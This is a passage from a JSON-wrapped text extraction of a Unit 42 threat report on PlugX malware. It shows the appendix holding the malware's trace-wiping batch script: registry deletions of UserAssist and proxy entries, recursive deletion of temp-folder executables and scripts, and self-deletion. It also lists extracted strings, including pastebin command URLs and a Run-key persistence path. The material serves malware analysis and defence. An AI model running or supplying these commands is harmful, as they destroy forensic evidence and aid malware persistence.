\"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 10 of 12\n\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n96\r\n97\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643\\Software\\WinRAR\r\nSFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\r\nScript Host\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\Microsoft\\Windows\r\nScript Host\\Settings\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR SFX\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\fipubfg\\fipubfg.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{Q65231O0-O2S1-4857-N4PR-N8R7P6RN7Q27}\\pzq.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-1643_Classes\\Software\\WinRAR\r\nSFX\\C%%Users%ADMINI~1%AppData%Local%Temp\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\\rkcybere.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-\r\n9926F41749EA}\\Count\\P:\\Hfref\\Nqzvavfgengbe\\Qbjaybnqf\\ErtfubgCbegnoyr\\Ncc\\ertfubg\\ertfubg_k64.rkr\" /f\r\nreg delete \"HKU\\S-1-5-21-590835768-3595378272-1660587800-\r\n1643_Classes\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\SavedLegacySettings\"\r\n/f\r\ndel /s c:\\windows\\temp\\*.bat\r\ndel /s c:\\windows\\temp\\*.dat\r\ndel /s c:\\windows\\temp\\*.dll\r\ndel /s c:\\windows\\temp\\*.exe\r\ndel /s c:\\windows\\temp\\*.vbs\r\ndel %0\r\nAppendix D – PlugX Extracted strings\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 11 of 12\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\nhttps//pastebin.com/eSsjmhBG\r\nhttps://pastebin.com/PSxQd6qw\r\nhttps://pastebin.com/CzjM9qwi\r\nhttps://pastebin.com/xHDSxxMD\r\n%ProgramData%\\arm2sv1k\r\nDSSM\r\nDSSM\r\nMicrosoft Office Document Update Utility\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\r\nJmLI\r\n%ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe\r\n%ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe\r\n%ProgramFiles(x86)%\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe\r\n%windir%\\system32\\FlashPlayerApp.exe\r\nslax\r\npastebin\r\nmahTszuBzqwUTcGt\r\n%ProgramData%\\arm2sv1k\\Akgcl\r\nSource: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nhttps://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/"
	],
	"report_names": [
		"unit42-paranoid-plugx"
	],
	"threat_actors": [],
	"ts_created_at": 1775434161,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.pdf",
		"text": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.txt",
		"img": "https://archive.orkl.eu/b55a1b9004afc876f13ea36c12dd298dbffdf83d.jpg"
	}
}